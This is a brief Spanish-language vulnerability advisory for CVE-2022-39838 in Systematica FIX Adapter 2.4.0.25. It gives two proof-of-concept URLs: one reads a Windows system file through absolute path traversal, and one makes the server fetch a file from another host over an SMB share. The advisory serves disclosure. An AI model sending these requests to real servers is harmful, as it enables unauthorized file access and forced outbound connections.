
Prueba de concepto de exploit para CVE-2022-39838 que demuestra la inclusión remota de archivos y el recorrido absoluto de rutas en Systematica FIX Adapter (ALFAFX) 2.4.0.25 mediante peticiones HTTP.
Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 permite la inclusión remota de archivos mediante una ruta de recurso compartido UNC, y también permite el recorrido de ruta absoluta hacia rutas locales.
PoC:
http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts
http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt
Control de acceso incorrecto
Systematica
Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)
Remoto
true
Un usuario remoto puede obtener acceso a cualquier archivo del sistema operativo mediante una ruta absoluta. Además, el usuario remoto puede obligar al servidor vulnerable a solicitar un archivo desde otra máquina a través de smb.
Ivashchenko Sergey (Jet Infosystems, jet.su)